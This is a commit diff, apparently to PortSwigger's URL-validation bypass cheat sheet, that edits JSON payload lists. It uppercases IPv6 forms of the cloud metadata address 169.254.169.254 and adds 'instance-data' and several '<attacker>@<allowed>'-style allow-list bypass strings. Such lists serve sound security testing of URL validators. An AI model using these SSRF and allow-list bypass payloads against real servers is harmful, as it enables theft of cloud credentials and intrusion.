Minor changes

PortSwigger · Aug 14, 2024 · 291e2b5 · 291e2b5
1 parent a0ea4fd
commit 291e2b5
Show file tree

Hide file tree

Showing 5 changed files with 220 additions and 74 deletions.
diff --git a/src/cloud_metadata_endpoints.json b/src/cloud_metadata_endpoints.json
@@ -2,31 +2,31 @@
     "name": "Cloud metadata endpoints",
     "payloads": [
         {
-            "payload": "::ffff:169.254.169.254",
+            "payload": "::FFFF:169.254.169.254",
             "prefix": "http://",
             "suffix": "/latest/meta-data/",
             "description": "IPv4 inside IPv6 representation of 169.254.169.254",
             "filters": [],
             "tags": ["URL", "HOST"],
-            "id": "bcacc49b27207fcb7575ea180f312635bf411ec5"
+            "id": "bd636e84a2c71da7fe1f1f13c11c9ae566e120de"
         },
         {
-            "payload": "[::ffff:169.254.169.254]",
+            "payload": "[::FFFF:169.254.169.254]",
             "prefix": "http://",
             "suffix": "/latest/meta-data/",
             "description": "IPv4 inside IPv6 representation of 169.254.169.254",
             "filters": [],
             "tags": ["URL", "HOST"],
-            "id": "b0efd8668d0d5d3841d8a5c2f257b481e59481d1"
+            "id": "d352abb83fec3a1773269884f002b597fb09e4f4"
         },
         {
-            "payload": "[::\ufb00\ufb00:a9fe:a9fe]",
+            "payload": "[::\ufb00\ufb00:A9FE:A9FE]",
             "prefix": "http://",
             "suffix": "/latest/meta-data/",
-            "description": "Latin Small Ligature Ff [::ffff:a9fe:a9fe]",
+            "description": "Latin Small Ligature Ff [::FFFF:A9FE:A9FE]",
             "filters": [],
             "tags": ["URL", "HOST"],
-            "id": "be9ac402045f11192b8782cf15e0b0302145ee13"
+            "id": "5ca09f9651a39f32fef785914354aeacb3880776"
         },
         {
             "payload": "[::FFFF:A9FE:A9FE]",
@@ -41,28 +41,28 @@
             "payload": "[0:0:0:0:0:\ufb00\ufb00:169.254.169.254]",
             "prefix": "http://",
             "suffix": "/latest/meta-data/",
-            "description": "Latin Small Ligature Ff [0:0:0:0:0:ffff:169.254.169.254]",
+            "description": "Latin Small Ligature Ff [0:0:0:0:0:FFFF:169.254.169.254]",
             "filters": [],
             "tags": ["URL", "HOST"],
             "id": "ed6207ac50c89c390c04d3b3aaea61823ea11dd6"
         },
         {
-            "payload": "[0:0:0:0:0:ffff:a9fe:a9fe]",
+            "payload": "[0:0:0:0:0:FFFF:A9FE:A9FE]",
             "prefix": "http://",
             "suffix": "/latest/meta-data/",
-            "description": "Expanded form of [::ffff:a9fe:a9fe]",
+            "description": "Expanded form of [::FFFF:A9FE:A9FE]",
             "filters": [],
             "tags": ["URL", "HOST"],
-            "id": "4f10bf4b85296551464554ad2aaa39df3827403f"
+            "id": "16de66644409c8702be229cae22a0a50262b893c"
         },
         {
-            "payload": "[fd00:ec2::254]",
+            "payload": "[FD00:EC2::254]",
             "prefix": "http://",
             "suffix": "/latest/meta-data/",
             "description": "AWS EC2 IPv6 address https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html",
             "filters": [],
             "tags": ["URL", "HOST"],
-            "id": "ac92c17d4e064ceb35f590d7b7d48f0ec71f213b"
+            "id": "cd81218bf46d4b52310acf6c5888e60858c7b398"
         },
         {
             "payload": "0251.0376.0251.0376",
@@ -126,6 +126,15 @@
             "filters": [],
             "tags": ["URL", "HOST"],
             "id": "4ec56b2a29ac77e92f07856ccf340e3560926bb8"
+        },
+        {
+            "payload": "instance-data",
+            "prefix": "http://",
+            "suffix": "/latest/meta-data/",
+            "description": "http://instance-data/latest/meta-data/",
+            "filters": [],
+            "tags": ["URL", "HOST"],
+            "id": "dff5924f89035a24eca8f5f248451835f0ac2bf3"
         }
     ]
 }
diff --git a/src/domain_allow_list_bypass.json b/src/domain_allow_list_bypass.json
@@ -176,6 +176,13 @@
             "tags": ["URL", "HOST"],
             "id": "6daae0f409c72cbbd99147e4f6ab1dfaf6b88389"
         },
+        {
+            "payload": "<allowed>\\;@<attacker>",
+            "description": "<allowed>\\;@<attacker>",
+            "filters": [],
+            "tags": ["URL", "HOST"],
+            "id": "20a4f5a73241252db609f1caafae7da01f8fb5e1"
+        },
         {
             "payload": "<allowed>&anything@<attacker>",
             "description": "<allowed>&anything@<attacker>",
@@ -319,6 +326,13 @@
             "description": "URL-splitting Unicode characters: <attacker>.<allowed>",
             "id": "a5a32ef167f46cc9c60bdfbc8df69bcdcc2d2181"
         },
+        {
+            "payload": "<attacker>@@<allowed>",
+            "description": "<attacker>@@<allowed>",
+            "filters": [],
+            "tags": ["URL", "HOST"],
+            "id": "19ae42a42f3c5d92a3e1f9d304552bd9a141fe03"
+        },
         {
             "payload": "<attacker>@<allowed>",
             "description": "<attacker>@<allowed>",
@@ -459,6 +473,20 @@
             "tags": ["URL", "HOST"],
             "id": "5dd6a69ee2a931af86b364526cae2ac042c44720"
         },
+        {
+            "payload": "<attacker>+@<allowed>",
+            "description": "<attacker>+@<allowed>",
+            "filters": [],
+            "tags": ["URL", "HOST"],
+            "id": "5b8e0bc8293698b758b60ada6296d21b35e6ccb7"
+        },
+        {
+            "payload": "<attacker>+&@<allowed>",
+            "description": "<attacker>+&@<allowed>",
+            "filters": [],
+            "tags": ["URL", "HOST"],
+            "id": "3060002806833f0dcf9b0d2fb4964741f25a513a"
+        },
         {
             "payload": "<attacker>\u0000<allowed>",
             "description": "<attacker>(U+0000)<allowed>",